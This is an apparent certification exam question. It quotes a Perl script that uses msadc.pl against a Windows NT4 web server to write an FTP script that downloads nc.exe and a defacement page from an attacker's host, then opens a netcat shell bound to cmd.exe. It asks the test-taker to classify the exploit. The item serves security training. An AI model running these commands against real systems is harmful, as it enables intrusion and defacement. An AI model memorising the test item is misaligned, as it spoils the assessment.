A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows
NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On
further research, the tester come across a perl script that runs the following msadc
functions:system(“perl msadc.pl -h $host -C \”echo open $your >testfile\””); system(“perl msadc.pl
-h $host -C \”echo $user>>testfile\””); system(“perl msadc.pl -h $host -C \”echo
$pass>>testfile\””); system(“perl msadc.pl -h $host -C \”echo bin>>testfile\””); system(“perl
msadc.pl -h $host -C \”echo get nc.exe>>testfile\””); system(“perl msadc.pl -h $host -C \”echo get
hacked.html>>testfile\””); (“perl msadc.pl -h $host -C \”echo quit>>testfile\””); system(“perl
msadc.pl -h $host -C \”ftp \-s\:testfile\””); $o=; print “Opening …\n”; system(“perl msadc.pl -h
$host -C \”nc -l -p $port -e cmd.exe\””);
Which exploit is indicated by this script?
A.
A buffer overflow exploit
B.
A chained exploit
C.
A SQL injection exploit
D.
A denial of service exploit